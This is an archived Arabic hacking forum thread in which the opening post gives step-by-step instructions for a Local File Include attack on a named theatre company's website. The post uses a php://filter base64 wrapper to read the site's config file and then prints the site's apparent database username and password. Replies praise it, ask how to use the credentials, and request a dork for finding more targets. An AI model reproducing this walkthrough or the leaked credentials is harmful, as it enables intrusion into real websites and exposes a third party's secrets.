المساعد الشخصي الرقمي

مشاهدة النسخة كاملة : ثغرة Local File Include



Omar hcj
07-27-2012, 09:46 AM
بسم الله الرحمن الرحيم
اخواني الكرام
السلام عليكم و رحمة الله وبركاته
الموضوع عن ثغرات:Local File Include بظن أغلبكم بيعرفها
اولا لدينا الموقع المستهدف: http://theatrefoxcompagnie.com/index.php?page= هذا هو الموقع
نكتب هذا الكود بعد الرابط مباشرة
php://filter/convert.base64-encode/resource=index

طبعا هو ليس كود إنما فلتر المهم بعد هذا الكود يطلع لنا كلام بالانجليزي.!!!
الان ننسخ هذا الكلام و ننتقل لهذا الموقع لفك التشفير ... http://home.paulschou.net/tools/xlate/ تمام
او بإمكانك فك التشفير عن طريق الشيل !!!
والمراد من فك التشفير هو الحصول على ملف الكونيفق
بعد فك التشفير نأخذ هذه الكلمة config_inc تمام
وننسخها ونحذف كلمة index في الكود السابق ونضع هذه الكلمة config_inc رائع يعني بصير الكود

php://filter/convert.base64-encode/resource=config_inc
الان نرى كلام انجليزي نقوم بنسخه و بفك تشفيره إما عبر الشيل او عبر الموقع حسب الرغبة
وبعد فك التشفير نجد المعلومات كالتالي
user:foxcompagnie
Password:b9waz95d
database:theatrefoxcompagniecom
انتهى الشرح و سأترككم الان مع الصور
http://www7.0zz0.com/2012/07/27/06/659407030.png
http://www7.0zz0.com/2012/07/27/06/493543474.png
http://www7.0zz0.com/2012/07/27/06/494803396.png
http://www7.0zz0.com/2012/07/27/06/989108733.png
http://www7.0zz0.com/2012/07/27/06/698277923.png

والحمد لله رب العالمين
لا تنسونا من خير الدعاء لي و لوالديه
والرجاء عدم تدمير المواقع الإسلامية و الثقافية التعليمية ولو كانت انكليزية
الهدف من الدرس لأغراض تعليمية فقط !!!
انتهى

HackLord
07-27-2012, 12:50 PM
ثانكس موضوع رائع ويشرفني أكون اول واحد يرد عليه بس عندي أستفسار بسيط
1.أين سأستعمل اليوزر نيم والباسورد للكونفج ؟؟

Omar hcj
07-27-2012, 09:33 PM
مشكور على ردك وبالنسبة لسؤالك
لح ساوي درس عليه
انتظرني

عاشق السبام
07-27-2012, 09:36 PM
بارك الله فيك

Omar hcj
07-27-2012, 11:19 PM
بارك الله فيك
يشرفني ردك

حبوط
07-28-2012, 04:23 AM
بارك الله فيك يالغالي شرح ولا اروع

Omar hcj
07-28-2012, 04:26 AM
بارك الله فيك يالغالي شرح ولا اروع

شرفني مرورك اخي الكريم وان شاء الله يكون الشرح وافي

HackLord
07-28-2012, 01:27 PM
بأنتظار المزيد من ابداعاتك

مشكور على ردك وبالنسبة لسؤالك
لح ساوي درس عليه
انتظرني

Tannous
07-30-2012, 12:04 AM
keep helping ...

Omar hcj
08-01-2012, 07:40 AM
مشكورين على الردود والتقيم

sg1aymen
10-12-2012, 12:18 AM
مشكورين على الردود والتقيم


أخي العزيز
موضوعك هو جيد، ولكن
يعطينا dork للبحثث

adam master
10-12-2012, 04:18 PM
شكرا جزيلا انا استفدت

jok17
10-20-2012, 01:57 PM
بارك الله فيك

lorans_syeia
10-23-2012, 07:39 PM
يعطيك العافية

(dz-adil@x-HaCkEr)
10-26-2012, 09:48 AM
بارك الله فيك يا غالي على الشرح الموفق
دمت بالف خير

- - - تم التحديث - - -

بارك الله فيك يا غالي على الشرح الموفق
دمت بالف خير

almadena7gna
10-26-2012, 02:25 PM
شكرا بحاول اسويها^^"